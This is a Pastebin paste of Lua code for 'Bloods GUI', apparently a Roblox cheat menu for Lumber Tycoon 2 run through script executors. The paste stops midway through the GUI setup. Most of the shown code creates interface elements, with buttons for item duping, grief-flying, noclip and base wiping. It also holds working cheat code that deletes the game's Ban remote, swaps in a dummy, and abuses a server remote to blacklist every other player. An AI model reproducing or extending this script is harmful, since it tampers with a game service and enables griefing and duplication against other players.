Advertisement
kkicks1

new blood gui

Nov 18th, 2019
172
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 168.65 KB | None | 0 0
  1. -- Objects
  2.  
  3. local Intro = Instance.new("ScreenGui")
  4. local IntroImage = Instance.new("ImageLabel")
  5. local _1 = Instance.new("TextLabel")
  6. local _2 = Instance.new("TextLabel")
  7. local _3 = Instance.new("TextLabel")
  8. local _4 = Instance.new("TextLabel")
  9. local _5 = Instance.new("TextLabel")
  10. local _6 = Instance.new("TextLabel")
  11. local _7 = Instance.new("TextLabel")
  12.  
  13. -- Properties
  14.  
  15. Intro.Name = "Intro"
  16. Intro.Parent = game.CoreGui
  17.  
  18. IntroImage.Name = "IntroImage"
  19. IntroImage.Parent = Intro
  20. IntroImage.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  21. IntroImage.BackgroundTransparency = 1
  22. IntroImage.BorderColor3 = Color3.new(1, 1, 1)
  23. IntroImage.BorderSizePixel = 0
  24. IntroImage.Position = UDim2.new(0.400, 0, 0.200, 0)
  25. IntroImage.Size = UDim2.new(0, 356, 0, 347)
  26. IntroImage.Image = "rbxassetid://1130382821"
  27.  
  28. _1.Name = "1"
  29. _1.Parent = IntroImage
  30. _1.BackgroundColor3 = Color3.fromRGB(249, 214, 46)
  31. _1.BackgroundTransparency = 1
  32. _1.BorderSizePixel = 0
  33. _1.Position = UDim2.new(0.109550565, 0, 0.423631132, 0)
  34. _1.Size = UDim2.new(0, 40, 0, 53)
  35. _1.Font = Enum.Font.ArialBold
  36. _1.FontSize = Enum.FontSize.Size14
  37. _1.Text = " "
  38. _1.TextColor3 = Color3.new(255, 0, 0)
  39. _1.TextScaled = true
  40. _1.TextSize = 14
  41. _1.TextWrapped = true
  42.  
  43. _2.Name = "2"
  44. _2.Parent = IntroImage
  45. _2.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  46. _2.BackgroundTransparency = 1
  47. _2.BorderSizePixel = 0
  48. _2.Position = UDim2.new(0.221910119, 0, 0.423631132, 0)
  49. _2.Size = UDim2.new(0, 40, 0, 53)
  50. _2.Font = Enum.Font.ArialBold
  51. _2.FontSize = Enum.FontSize.Size14
  52. _2.Text = "B"
  53. _2.TextColor3 = Color3.new(255, 0, 0)
  54. _2.TextScaled = true
  55. _2.TextSize = 14
  56. _2.TextWrapped = true
  57.  
  58. _3.Name = "3"
  59. _3.Parent = IntroImage
  60. _3.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  61. _3.BackgroundTransparency = 1
  62. _3.BorderSizePixel = 0
  63. _3.Position = UDim2.new(0.334269673, 0, 0.423631132, 0)
  64. _3.Size = UDim2.new(0, 40, 0, 53)
  65. _3.Font = Enum.Font.ArialBold
  66. _3.FontSize = Enum.FontSize.Size14
  67. _3.Text = "L"
  68. _3.TextColor3 = Color3.new(255, 0, 0)
  69. _3.TextScaled = true
  70. _3.TextSize = 14
  71. _3.TextWrapped = true
  72.  
  73. _4.Name = "4"
  74. _4.Parent = IntroImage
  75. _4.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  76. _4.BackgroundTransparency = 1
  77. _4.BorderSizePixel = 0
  78. _4.Position = UDim2.new(0.446629226, 0, 0.423631132, 0)
  79. _4.Size = UDim2.new(0, 40, 0, 53)
  80. _4.Font = Enum.Font.ArialBold
  81. _4.FontSize = Enum.FontSize.Size14
  82. _4.Text = "O"
  83. _4.TextColor3 = Color3.new(255, 0, 0)
  84. _4.TextScaled = true
  85. _4.TextSize = 14
  86. _4.TextWrapped = true
  87.  
  88. _5.Name = "5"
  89. _5.Parent = IntroImage
  90. _5.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  91. _5.BackgroundTransparency = 1
  92. _5.BorderSizePixel = 0
  93. _5.Position = UDim2.new(0.55898881, 0, 0.423631132, 0)
  94. _5.Size = UDim2.new(0, 40, 0, 53)
  95. _5.Font = Enum.Font.ArialBold
  96. _5.FontSize = Enum.FontSize.Size14
  97. _5.Text = "O"
  98. _5.TextColor3 = Color3.new(255, 0, 0)
  99. _5.TextScaled = true
  100. _5.TextSize = 14
  101. _5.TextWrapped = true
  102.  
  103. _6.Name = "6"
  104. _6.Parent = IntroImage
  105. _6.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  106. _6.BackgroundTransparency = 1
  107. _6.BorderSizePixel = 0
  108. _6.Position = UDim2.new(0.671348333, 0, 0.423631132, 0)
  109. _6.Size = UDim2.new(0, 40, 0, 53)
  110. _6.Font = Enum.Font.ArialBold
  111. _6.FontSize = Enum.FontSize.Size14
  112. _6.Text = "D"
  113. _6.TextColor3 = Color3.new(255, 0, 0)
  114. _6.TextScaled = true
  115. _6.TextSize = 14
  116. _6.TextWrapped = true
  117.  
  118. _7.Name = "7"
  119. _7.Parent = IntroImage
  120. _7.BackgroundColor3 = Color3.new(1, 1, 1)
  121. _7.BackgroundTransparency = 1
  122. _7.BorderSizePixel = 0
  123. _7.Position = UDim2.new(0.775280893, 0, 0.423631132, 0)
  124. _7.Size = UDim2.new(0, 40, 0, 53)
  125. _7.Font = Enum.Font.ArialBold
  126. _7.FontSize = Enum.FontSize.Size14
  127. _7.Text = " "
  128. _7.TextColor3 = Color3.new(255, 0, 0)
  129. _7.TextScaled = true
  130. _7.TextSize = 14
  131. _7.TextWrapped = true
  132.  
  133.  
  134.  
  135. _1.TextTransparency = 0.2
  136. wait()
  137. _2.TextTransparency = 0.2
  138. wait()
  139. _3.TextTransparency = 0.2
  140. wait()
  141. _4.TextTransparency = 0.2
  142. wait()
  143. _5.TextTransparency = 0.2
  144. wait()
  145. _6.TextTransparency = 0.2
  146. wait()
  147. _7.TextTransparency = 0.2
  148. wait()
  149. IntroImage.ImageTransparency = 0.2
  150. wait()
  151. _1.TextTransparency = 0.3
  152. wait()
  153. _2.TextTransparency = 0.3
  154. wait()
  155. _3.TextTransparency = 0.3
  156. wait()
  157. _4.TextTransparency = 0.3
  158. wait()
  159. _5.TextTransparency = 0.3
  160. wait()
  161. _6.TextTransparency = 0.3
  162. wait()
  163. _7.TextTransparency = 0.3
  164. wait()
  165. IntroImage.ImageTransparency = 0.3
  166. wait()
  167. _1.TextTransparency = 0.4
  168. wait()
  169. _2.TextTransparency = 0.4
  170. wait()
  171. _3.TextTransparency = 0.4
  172. wait()
  173. _4.TextTransparency = 0.4
  174. wait()
  175. _5.TextTransparency = 0.4
  176. wait()
  177. _6.TextTransparency = 0.4
  178. wait()
  179. _7.TextTransparency = 0.4
  180. wait()
  181. IntroImage.ImageTransparency = 0.4
  182. wait()
  183. _1.TextTransparency = 0.5
  184. wait()
  185. _2.TextTransparency = 0.5
  186. wait()
  187. _3.TextTransparency = 0.4
  188. wait()
  189. _4.TextTransparency = 0.5
  190. wait()
  191. _5.TextTransparency = 0.5
  192. wait()
  193. _6.TextTransparency = 0.5
  194. wait()
  195. _7.TextTransparency = 0.5
  196. wait()
  197. IntroImage.ImageTransparency = 0.5
  198. wait()
  199. _1.TextTransparency = 0.6
  200. wait()
  201. _2.TextTransparency = 0.6
  202. wait()
  203. _3.TextTransparency = 0.6
  204. wait()
  205. _4.TextTransparency = 0.6
  206. wait()
  207. _5.TextTransparency = 0.6
  208. wait()
  209. _6.TextTransparency = 0.6
  210. wait()
  211. _7.TextTransparency = 0.6
  212. wait()
  213. IntroImage.ImageTransparency = 0.6
  214. wait()
  215. _1.TextTransparency = 0.7
  216. wait()
  217. _2.TextTransparency = 0.7
  218. wait()
  219. _3.TextTransparency = 0.7
  220. wait()
  221. _4.TextTransparency = 0.7
  222. wait()
  223. _5.TextTransparency = 0.7
  224. wait()
  225. _6.TextTransparency = 0.7
  226. wait()
  227. _7.TextTransparency = 0.7
  228. wait()
  229. IntroImage.ImageTransparency = 0.7
  230. wait()
  231. _1.TextTransparency = 0.8
  232. wait()
  233. _2.TextTransparency = 0.8
  234. wait()
  235. _3.TextTransparency = 0.8
  236. wait()
  237. _4.TextTransparency = 0.8
  238. wait()
  239. _5.TextTransparency = 0.8
  240. wait()
  241. _6.TextTransparency = 0.8
  242. wait()
  243. _7.TextTransparency = 0.8
  244. wait()
  245. IntroImage.ImageTransparency = 0.8
  246. wait()
  247. _1.TextTransparency = 0.9
  248. wait()
  249. _2.TextTransparency = 0.9
  250. wait()
  251. _3.TextTransparency = 0.9
  252. wait()
  253. _4.TextTransparency = 0.9
  254. wait()
  255. _5.TextTransparency = 0.9
  256. wait()
  257. _6.TextTransparency = 0.9
  258. wait()
  259. _7.TextTransparency = 0.9
  260. wait()
  261. IntroImage.ImageTransparency = 0.9
  262. wait()
  263. _1.TextTransparency = 1
  264. wait()
  265. _2.TextTransparency = 1
  266. wait()
  267. _3.TextTransparency = 1
  268. wait()
  269. _4.TextTransparency = 1
  270. wait()
  271. _5.TextTransparency = 1
  272. wait()
  273. _6.TextTransparency = 1
  274. wait()
  275. _7.TextTransparency = 1
  276. wait()
  277. IntroImage.ImageTransparency = 0.9
  278. wait()
  279. _1.TextTransparency = 1.1
  280. wait()
  281. _2.TextTransparency = 1.1
  282. wait()
  283. _3.TextTransparency = 1.1
  284. wait()
  285. _4.TextTransparency = 1.1
  286. wait()
  287. _5.TextTransparency = 1.1
  288. wait()
  289. _6.TextTransparency = 1.1
  290. wait()
  291. _7.TextTransparency = 1.1
  292. wait()
  293. IntroImage.ImageTransparency = 5.1
  294. wait()
  295. Intro:Destroy()
  296. wait()
  297.  
  298. local s = Instance.new("Sound")
  299. s.Name = "Sound"
  300. s.SoundId = "http://www.roblox.com/asset/?id=2528420941"
  301. s.Volume = 0
  302. s.Looped = false
  303. s.archivable = false
  304. s.Parent = game.Workspace
  305. --Join
  306.  
  307. local k = Instance.new("Sound")
  308. k.Name = "Soundzz"
  309. k.SoundId = "http://www.roblox.com/asset/?id=305977837"
  310. k.Volume = 0
  311. k.Looped = false
  312. k.archivable = false
  313. k.Parent = game.Workspace
  314. --Left
  315.  
  316. local q = Instance.new("Sound")
  317. q.Name = "Soundzzzz"
  318. q.SoundId = "http://www.roblox.com/asset/?id=249869145"
  319. q.Volume = 0
  320. q.Looped = false
  321. q.archivable = false
  322. q.Parent = game.Workspace
  323. --Systems Online
  324.  
  325. local function SendNotification(title,text,duration,...)
  326. game.StarterGui:SetCore("SendNotification", {
  327. Title = title;
  328. Text = text;
  329. Icon = "";
  330. Duration = duration;
  331. })
  332. end
  333.  
  334. game.Players.ChildAdded:Connect(function(player)
  335. if not pcall (function()
  336. SendNotification("Player JOINED",""..player.Name.." has JOINED the game",5 )
  337. s:Play()
  338. end) then
  339. print ("Error")
  340. end
  341. end)
  342. ---------------------------------------------------------------------
  343. -- Same extra's apply down here as well.
  344.  
  345. game.Players.ChildRemoved:Connect(function(player)
  346. if not pcall (function()
  347. SendNotification("Player LEFT",""..player.Name.." has LEFT the game",4.4 )
  348. k:Play()
  349. end) then
  350. print ("Error")
  351. end
  352. end)
  353.  
  354. SendNotification("Loaded","Join and leave detector is loaded",2)
  355. q:Play()
  356.  
  357. -- Variables --
  358.  
  359. local Script = "BLOOD"
  360. local gFont = "SourceSans"
  361. local Visi = true
  362.  
  363. -- Functions --
  364.  
  365. function Log(text, r, g, b, font)
  366. game.StarterGui:SetCore("ChatMakeSystemMessage", {
  367. Text = "{" .. tostring(Script) .. "} - " .. text;
  368. Color = Color3.new(r, g, b);
  369. Font = Enum.Font[font];
  370. FontSize = Enum.FontSize.Size10;
  371. })
  372. end
  373. Log("Loading framework...", 255,0,0, tostring(gFont))
  374. ---------------------------------------------------------------------
  375.  
  376. -- Automatically Add players to Blacklist --
  377.  
  378. Mouse = game.Players.LocalPlayer:GetMouse()
  379.  
  380. game:service'ReplicatedStorage'.Interaction.Ban:Destroy()
  381. Instance.new('RemoteEvent', game:service'ReplicatedStorage'.Interaction).Name = "Ban"
  382.  
  383. Client = game.ReplicatedStorage.Interaction.ClientSetListPlayer
  384. players = game.Players
  385. for i, v in pairs(players:GetPlayers()) do
  386. if v.Name ~= players.LocalPlayer.Name then
  387. Client:InvokeServer(players.LocalPlayer.BlacklistFolder, v, true)
  388. end
  389. end
  390. players.PlayerAdded:connect(function(plr)
  391. Client:InvokeServer(players.LocalPlayer.BlacklistFolder, plr, true)
  392. end)
  393.  
  394. game:GetService("StarterGui"):SetCore("SendNotification", {
  395. Title = "BLOOD",
  396. Text = "Loaded Successful."
  397. })
  398.  
  399. local players = game:GetService('Players')
  400. if game.Players.LocalPlayer then
  401. game.StarterGui:SetCore('SendNotification', {
  402. Title = ' '.. players.LocalPlayer.Name..'!',
  403. Text = 'Welcome to Bloods GUI!',
  404. Icon = [[http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&Format=Png&userName=]]..players.LocalPlayer.Name..[[&RAND]] .. math.random(1,10000000),
  405. Duration = 5,
  406. })
  407. end
  408.  
  409. ---------------------------------------------------------------------
  410. WCollide = "Nothing"
  411. afkactive = false
  412. CustomLocationSet = false
  413.  
  414.  
  415. BLOOD = Instance.new("ScreenGui")
  416. MainFrame = Instance.new("Frame")
  417. ImageLabel = Instance.new("ImageLabel")
  418. OpenFrame = Instance.new("Frame")
  419. Open = Instance.new("ImageButton")
  420. CloseBLOOD = Instance.new("TextButton")
  421. Minimize = Instance.new("TextButton")
  422. MenuFrame = Instance.new("Frame")
  423. MenuFramea = Instance.new("Frame")
  424. AIntroImage = Instance.new("ImageLabel")
  425. AIntroImage1 = Instance.new("ImageLabel")
  426. BloodFrameInfo = Instance.new("TextLabel")
  427. Picker = Instance.new("ScrollingFrame")
  428. AIntroImage = Instance.new("ImageButton")
  429. ChangeItem = Instance.new("Frame")
  430. CurrentItem = Instance.new("ImageButton")
  431. LT2GUI2Frame = Instance.new("Frame")
  432. Btoolamenu = Instance.new("ImageButton")
  433. FunStuffHOVER = Instance.new("TextButton")
  434. FunStuffTHOMAS = Instance.new("TextButton")
  435. FunStuffPOLICE = Instance.new("TextButton")
  436. FunStuffSPRAY = Instance.new("TextButton")
  437. FunStuffCOCA = Instance.new("TextButton")
  438. FunStuffLEAKED = Instance.new("TextButton")
  439. FunStuffFLASH = Instance.new("TextButton")
  440. DeleteTool = Instance.new("TextButton")
  441. CopyTool = Instance.new("TextButton")
  442. MoveTool = Instance.new("TextButton")
  443. BuyFrame = Instance.new("Frame")
  444. Buymenu = Instance.new("ImageButton")
  445. bcps = Instance.new("TextButton")
  446. fshop = Instance.new("TextButton")
  447. wrus = Instance.new("TextButton")
  448. bp = Instance.new("TextButton")
  449. ls = Instance.new("TextButton")
  450. Halloween = Instance.new("TextButton")
  451. toolaFrame = Instance.new("Frame")
  452. toolamenu = Instance.new("ImageButton")
  453. WalkspeedLabel = Instance.new("TextButton")
  454. JumpText = Instance.new("TextBox")
  455. WalkSpeed = Instance.new("TextLabel")
  456. JumpPower = Instance.new("TextButton")
  457. AntiBlack = Instance.new("TextButton")
  458. GriefFly = Instance.new("TextButton")
  459. StopGriefFly = Instance.new("TextButton")
  460. Fly = Instance.new("TextButton")
  461. PinkWires = Instance.new("TextButton")
  462. WaterCollide = Instance.new("TextButton")
  463. ClickTP = Instance.new("TextButton")
  464. Noclip = Instance.new("TextButton")
  465. AntiAFK = Instance.new("TextButton")
  466. AntiAFKtime = Instance.new("TextLabel")
  467. Fog = Instance.new("TextButton")
  468. CARA = Instance.new("TextButton")
  469. CARAs = Instance.new("TextBox")
  470. RemoveT = Instance.new("TextButton")
  471. Brid = Instance.new("TextLabel")
  472. BridDown = Instance.new("TextButton")
  473. Bridup = Instance.new("TextButton")
  474. ReJoinServer = Instance.new("TextButton")
  475. Reset = Instance.new("TextButton")
  476. WipeBase = Instance.new("TextButton")
  477. MaxLand = Instance.new("TextButton")
  478. BluePrints = Instance.new("TextButton")
  479. Landart = Instance.new("TextButton")
  480. Hoofer = Instance.new("TextButton")
  481. TripleWalls = Instance.new("TextButton")
  482. DoubleWalls = Instance.new("TextButton")
  483. SingleWalls = Instance.new("TextButton")
  484. BaseFLOOR = Instance.new("TextButton")
  485. PaintFill = Instance.new("TextButton")
  486. ArtFrame = Instance.new("Frame")
  487. Artmenu = Instance.new("ImageButton")
  488. Paint = Instance.new("TextButton")
  489. Slot = Instance.new("TextBox")
  490. DMoney = Instance.new("TextButton")
  491. Load = Instance.new("TextButton")
  492. Store = Instance.new("TextButton")
  493. Restore = Instance.new("TextButton")
  494. SaveSlot = Instance.new("TextButton")
  495. DropAxes = Instance.new("TextButton")
  496. CountAxes = Instance.new("TextButton")
  497. GetWires = Instance.new("TextButton")
  498. GetVehicle = Instance.new("TextButton")
  499. GetFurniture = Instance.new("TextButton")
  500. GetStructure = Instance.new("TextButton")
  501. GetGifts = Instance.new("TextButton")
  502. GetAxes = Instance.new("TextButton")
  503. GetItems = Instance.new("TextButton")
  504. GetWood = Instance.new("TextButton")
  505. ItemDupe = Instance.new("TextButton")
  506. CopyBase = Instance.new("TextButton")
  507. AXETRUCK = Instance.new("TextButton")
  508. WireObjects = Instance.new("TextButton")
  509. giftsport = Instance.new("TextButton")
  510. HardStructures = Instance.new("TextButton")
  511. other = Instance.new("TextButton")
  512. other1 = Instance.new("TextButton")
  513. TPtreesPlanks = Instance.new("TextButton")
  514. PlayerNameBox = Instance.new("TextBox")
  515. CopyFrame = Instance.new("Frame")
  516. Copymenu = Instance.new("ImageButton")
  517. Treeaura = Instance.new("TextButton")
  518. Tptree = Instance.new("TextButton")
  519. TptreeFrame = Instance.new("Frame")
  520. Type = Instance.new("TextBox")
  521. TpAllPlanks = Instance.new("TextButton")
  522. TPWood = Instance.new("TextButton")
  523. SellPlanks = Instance.new("TextButton")
  524. SellWood = Instance.new("TextButton")
  525. Harddrag = Instance.new("TextButton")
  526. Goldaxe = Instance.new("TextButton")
  527. WoodFrame = Instance.new("Frame")
  528. Woodmenu = Instance.new("ImageButton")
  529. SawmillTp = Instance.new("TextButton")
  530. Waypoints = Instance.new("ScrollingFrame")
  531. Stranger = Instance.new("TextButton")
  532. BobsShack = Instance.new("TextButton")
  533. PlotTp = Instance.new("TextButton")
  534. FancyFurnishings = Instance.new("TextButton")
  535. FineArtsShop = Instance.new("TextButton")
  536. LinksLogic = Instance.new("TextButton")
  537. SpawnPoint = Instance.new("TextButton")
  538. Dock = Instance.new("TextButton")
  539. Bridge = Instance.new("TextButton")
  540. ShrineOfSight = Instance.new("TextButton")
  541. TheDen = Instance.new("TextButton")
  542. VolcanoWin = Instance.new("TextButton")
  543. SkiLodge = Instance.new("TextButton")
  544. ShowLocation = Instance.new("TextButton")
  545. CustomTPPoint = Instance.new("TextButton")
  546. Teleport = Instance.new("ImageButton")
  547. PlayerFrame = Instance.new("Frame")
  548. Player1 = Instance.new("TextButton")
  549. Player2 = Instance.new("TextButton")
  550. Player3 = Instance.new("TextButton")
  551. Player4 = Instance.new("TextButton")
  552. Player5 = Instance.new("TextButton")
  553. Player6 = Instance.new("TextButton")
  554. PlyrSel = Instance.new("TextLabel")
  555. TpPlayer = Instance.new("TextButton")
  556. TpBase = Instance.new("TextButton")
  557. Player = Instance.new("ImageButton")
  558. Depart = Instance.new("TextLabel")
  559. Paintingf = Instance.new("TextButton")
  560. InfoText1 = Instance.new("TextLabel")
  561. BigPlank = Instance.new("TextButton")
  562. BirchTree = Instance.new("ImageButton")
  563. CavecrawlerTree = Instance.new("ImageButton")
  564. CherryTree = Instance.new("ImageButton")
  565. ElmTree = Instance.new("ImageButton")
  566. FirTree = Instance.new("ImageButton")
  567. Frosttree = Instance.new("ImageButton")
  568. GenericTree = Instance.new("ImageButton")
  569. GoldTree = Instance.new("ImageButton")
  570. KoaTree = Instance.new("ImageButton")
  571. LavaTree = Instance.new("ImageButton")
  572. PalmTree = Instance.new("ImageButton")
  573. PhantomTree = Instance.new("ImageButton")
  574. PineTree = Instance.new("ImageButton")
  575. SinisterGlow = Instance.new("ImageButton")
  576. Snowglowtree = Instance.new("ImageButton")
  577. Spooktree = Instance.new("ImageButton")
  578. WalnutTree = Instance.new("ImageButton")
  579. ZombieTree = Instance.new("ImageButton")
  580. TpCar = Instance.new("TextButton")
  581. TpCarFrame = Instance.new("Frame")
  582. SpawnPointa = Instance.new("TextButton")
  583. furnabox = Instance.new("TextButton")
  584. LinkLogic = Instance.new("TextButton")
  585. Bshack = Instance.new("TextButton")
  586. Docka = Instance.new("TextButton")
  587. FineShop = Instance.new("TextButton")
  588. Deny = Instance.new("TextButton")
  589. OfSight = Instance.new("TextButton")
  590. SKI = Instance.new("TextButton")
  591. LightHouse = Instance.new("TextButton")
  592. LavaTreeA = Instance.new("TextButton")
  593. PalmTreeA = Instance.new("TextButton")
  594. SnowglowtreeA = Instance.new("TextButton")
  595. GoldTreeA = Instance.new("TextButton")
  596. CarRotate = Instance.new("TextButton")
  597. CarRotates = Instance.new("TextButton")
  598.  
  599. --Properties:
  600. BLOOD.Name = "BLOOD"
  601. BLOOD.Parent = game.CoreGui
  602.  
  603. OpenFrame.Name = "OpenFrame"
  604. OpenFrame.Parent = BLOOD
  605. OpenFrame.BackgroundColor3 = Color3.fromRGB(196, 40, 28)
  606. OpenFrame.BorderColor3 = Color3.fromRGB(196, 40, 28)
  607. OpenFrame.Position = UDim2.new(0.5, -40, 0, -28)
  608. OpenFrame.Size = UDim2.new(0, 80, 0, 20)
  609.  
  610. Open.Name = "Open"
  611. Open.Parent = OpenFrame
  612. Open.BackgroundColor3 = Color3.new(0.1, 0.1, 0.1)
  613. Open.BorderColor3 = Color3.fromRGB(196, 40, 28)
  614. Open.Size = UDim2.new(0, 80, 0, 20)
  615. Open.Image = "rbxassetid://3630810430"
  616. Open.Selectable = true
  617.  
  618. Open.MouseEnter:connect(function()
  619. InfoText1.Visible = true
  620. end)
  621.  
  622. Open.MouseLeave:connect(function()
  623. InfoText1.Visible = false
  624. end)
  625.  
  626. InfoText1.Name = "InfoText1"
  627. InfoText1.Parent = OpenFrame
  628. InfoText1.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  629. InfoText1.BorderColor3 = Color3.new(0, 0, 0)
  630. InfoText1.BackgroundTransparency = 0.5
  631. InfoText1.Position = UDim2.new(0, -50, 0, 80)
  632. InfoText1.Size = UDim2.new(0, 190, 0, 130)
  633. InfoText1.TextColor3 = Color3.new(1, 1, 1)
  634. InfoText1.Font = Enum.Font.Fantasy
  635. InfoText1.Text = "This Gui was created by Oddy\n\nCredits:\n\nJohiro for the original scripts and fixing some broken ones. Big thanks to DIRT Gui for swapping scripts"
  636. InfoText1.TextSize = 15
  637. InfoText1.TextWrapped = true
  638. InfoText1.Visible = false
  639. InfoText1.ZIndex = 7
  640. InfoText1.TextYAlignment = Enum.TextYAlignment.Top
  641.  
  642. MainFrame.Name = "MainFrame"
  643. MainFrame.Parent = BLOOD
  644. MainFrame.Active = true
  645. MainFrame.Draggable = true
  646. MainFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  647. MainFrame.Position = UDim2.new(0.0111675123, 0, 0.436827958, 0)
  648. MainFrame.Selectable = true
  649. MainFrame.Size = UDim2.new(0, 500, 0, 500)
  650. MainFrame.Visible = false
  651.  
  652. ImageLabel.Name = "ImageLabel"
  653. ImageLabel.Parent = MainFrame
  654. ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  655. ImageLabel.Position = UDim2.new(-0.000475523295, 0, -0.00117481197, 0)
  656. ImageLabel.Size = UDim2.new(0, 500, 0, 500)
  657. ImageLabel.Image = "rbxassetid://3883502641"
  658.  
  659. CloseBLOOD.Name = "CloseBLOOD"
  660. CloseBLOOD.Parent = MainFrame
  661. CloseBLOOD.BackgroundColor3 = Color3.new(0, 0, 0)
  662. CloseBLOOD.BorderColor3 = Color3.fromRGB(196, 40, 28)
  663. CloseBLOOD.Position = UDim2.new(0, 5, 0, 5)
  664. CloseBLOOD.Size = UDim2.new(0, 20, 0, 20)
  665. CloseBLOOD.Font = Enum.Font.Fantasy
  666. CloseBLOOD.FontSize = Enum.FontSize.Size18
  667. CloseBLOOD.Text = "X"
  668. CloseBLOOD.TextColor3 = Color3.new(1, 1, 1)
  669. CloseBLOOD.TextScaled = true
  670. CloseBLOOD.TextWrapped = true
  671. CloseBLOOD.TextSize = 17
  672.  
  673. Minimize.Name = "Minimize"
  674. Minimize.Parent = MainFrame
  675. Minimize.BackgroundColor3 = Color3.new(0, 0, 0)
  676. Minimize.BorderColor3 = Color3.fromRGB(196, 40, 28)
  677. Minimize.Position = UDim2.new(0, 26, 0, 5)
  678. Minimize.Size = UDim2.new(0, 20, 0, 20)
  679. Minimize.Font = Enum.Font.Fantasy
  680. Minimize.FontSize = Enum.FontSize.Size18
  681. Minimize.Text = "-"
  682. Minimize.TextColor3 = Color3.new(1, 1, 1)
  683. Minimize.TextScaled = true
  684. Minimize.TextWrapped = true
  685. Minimize.TextSize = 17
  686.  
  687. MenuFrame.Name = "MenuFrame"
  688. MenuFrame.Parent = MainFrame
  689. MenuFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  690. MenuFrame.BackgroundTransparency = 1
  691. MenuFrame.BorderColor3 = Color3.new(0, 1, 0)
  692. MenuFrame.Position = UDim2.new(0, 5, 0, 30)
  693. MenuFrame.Size = UDim2.new(0, 170, 0,400)
  694.  
  695. MenuFramea.Name = "MenuFrame"
  696. MenuFramea.Parent = MainFrame
  697. MenuFramea.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  698. MenuFramea.BackgroundTransparency = 1
  699. MenuFramea.BorderColor3 = Color3.new(0, 1, 0)
  700. MenuFramea.Position = UDim2.new(0, 270, 0, 140)
  701. MenuFramea.Size = UDim2.new(0, 120, 0,350)
  702.  
  703. AIntroImage.Name = "IntroImage"
  704. AIntroImage.Parent = MainFrame
  705. AIntroImage.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  706. AIntroImage.BackgroundTransparency = 1
  707. AIntroImage.BorderColor3 = Color3.new(1, 1, 1)
  708. AIntroImage.BorderSizePixel = 0
  709. AIntroImage.Position = UDim2.new(0, 10, 0, 335)
  710. AIntroImage.Size = UDim2.new(0, 120, 0, 30)
  711. AIntroImage.Image = "rbxassetid://3630810430"
  712. AIntroImage.Visible = true
  713.  
  714. AIntroImage1.Name = "IntroImage"
  715. AIntroImage1.Parent = MainFrame
  716. AIntroImage1.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  717. AIntroImage1.BackgroundTransparency = 1
  718. AIntroImage1.BorderColor3 = Color3.new(1, 1, 1)
  719. AIntroImage1.BorderSizePixel = 0
  720. AIntroImage1.Position = UDim2.new(0, 10, 0, 370)
  721. AIntroImage1.Size = UDim2.new(0, 120, 0, 120)
  722. AIntroImage1.Image = "rbxassetid://3940167130"
  723. AIntroImage1.Visible = true
  724.  
  725. BloodFrameInfo.Name = "BloodFrameInfo"
  726. BloodFrameInfo.Parent = MenuFrame
  727. BloodFrameInfo.BackgroundColor3 = Color3.new(0, 0, 0)
  728. BloodFrameInfo.BackgroundTransparency = 1
  729. BloodFrameInfo.Position = UDim2.new(0, 3, 0, 3)
  730. BloodFrameInfo.Size = UDim2.new(0, 164, 0, 310)
  731. BloodFrameInfo.Font = Enum.Font.Fantasy
  732. BloodFrameInfo.FontSize = Enum.FontSize.Size14
  733. BloodFrameInfo.Text = "A NEW ITEM PINK CAR SPAWNER .\n\nFIX will now run on most executers, (AUTOBUY will not work on some).\n\nNew menus Paint tool, Paint Fill and Single Item Port,\n\nNew Port to tree menu.\n\nA BIG THANKS TO JOHIRO FOR WORKING ON THE NEW SCRIPTS.\n\nScripts may LAG and big so give time to load."
  734. BloodFrameInfo.TextColor3 = Color3.new(0, 0, 0)
  735. BloodFrameInfo.TextWrapped = true
  736. BloodFrameInfo.TextSize = 14
  737. BloodFrameInfo.Visible = true
  738. Log("Loaded framework successfully!", 0,255,255, tostring(gFont))
  739.  
  740.  
  741. Depart.Name = "Depart"
  742. Depart.Parent = MainFrame
  743. Depart.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  744. Depart.BorderColor3 = Color3.new(0, 0, 0)
  745. Depart.BorderSizePixel = 2
  746. Depart.Position = UDim2.new(0, 50, 0, 5)
  747. Depart.Size = UDim2.new(0, 130, 0, 20)
  748. Depart.BackgroundTransparency=1
  749. Depart.Font = Enum.Font.Fantasy
  750. Depart.FontSize = Enum.FontSize.Size18
  751. Depart.Text = "Ferry Departs: 0"
  752. Depart.TextColor3 = Color3.new(1, 1, 1)
  753. Depart.TextSize = 15
  754. Depart.TextStrokeColor3 = Color3.new(1, 1, 1)
  755. Depart.TextWrapped = true
  756.  
  757. game.Workspace.Ferry.TimeToDeparture.Changed:connect(function()
  758. Depart.Text = "Ferry Departs: ".. game.Workspace.Ferry.TimeToDeparture.Value
  759. if Depart.Text == "Ferry Departs: 0" then
  760. wait(6)
  761. Depart.Text = "Ferry has Departed"
  762. else
  763. Depart.Text = "Ferry Departs: ".. game.Workspace.Ferry.TimeToDeparture.Value
  764. end
  765. end)
  766.  
  767. ChangeItem.Name = "ChangeItem"
  768. ChangeItem.Parent = MainFrame
  769. ChangeItem.BackgroundColor3 = Color3.fromRGB(193, 40, 28)
  770. ChangeItem.BorderColor3 = Color3.new(0, 0, 0)
  771. ChangeItem.BorderSizePixel = 2
  772. ChangeItem.Position = UDim2.new(0, 390, 1, -110)
  773. ChangeItem.Size = UDim2.new(0, 100, 0, 100)
  774. ChangeItem.ZIndex = 2
  775.  
  776. CurrentItem.Name = "CurrentItem"
  777. CurrentItem.Parent = ChangeItem
  778. CurrentItem.BackgroundColor3 = Color3.new(1, 1, 1)
  779. CurrentItem.BorderColor3 = Color3.new(0, 0, 0)
  780. CurrentItem.BorderSizePixel = 2
  781. CurrentItem.Position = UDim2.new(0, 10, 0, 10)
